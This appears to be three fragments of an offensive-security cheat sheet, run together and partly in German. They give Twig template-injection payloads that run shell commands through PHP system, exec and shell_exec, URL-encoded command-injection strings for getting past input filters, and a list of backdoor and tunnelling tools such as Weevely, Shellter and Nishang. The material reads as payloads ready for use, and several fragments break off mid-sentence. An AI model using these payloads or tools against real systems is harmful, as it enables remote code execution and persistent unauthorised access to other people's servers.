-
Twig is a MVC-based template engine for PHP. Documentation Output a value: {{ var }} Force a error, e.g. via a invalid operation: {{'a' * 5}} Concatanation of strings: {{ 'a' ~ 'a' }} The reduce method take a function and then parameters… (It’s a PHP template engine, remember?) {{ [0]|reduce('system','whoami')}}{{ [0]|reduce('exec', 'whoami') }}{{ [0]|reduce('shell_exec', 'whoami') }}{{…
-
See also the encoding post for encoding methods. Tips Bypassing filters Linux / PHP All URL encoded values starting with a space character. | id %20%7c%20%69%64 || id %20%7c%7c%20%69%64 & id %20%26%20%69%64 && id %20%26%26%20%69%64 <?php print "1"" ?> %20%3c%3f%70%68%70%20%70%72%69%6e%74%20%22%31%22%22%20%3f%3e ;id %20%3b%69%64 Sources
-
Weevely https://tools.kali.org/maintaining-access/weevely Erzeugt PHP-Skript auf Server, mit dem man eine Shell wieder bekommen kann. Various scripts Shelter (win32) Dynamic shell injection tool into normal Windows binaries. https://tools.kali.org/maintaining-access/shellter Create own (normal) shell HTTPTunnel Needs PHP; creates file on a server which acts as SSH proxy. Nishang Collection of PowerShell scripts for backdoors and more. Kali:/usr/share/nishang dns2tcp Creates a TCP…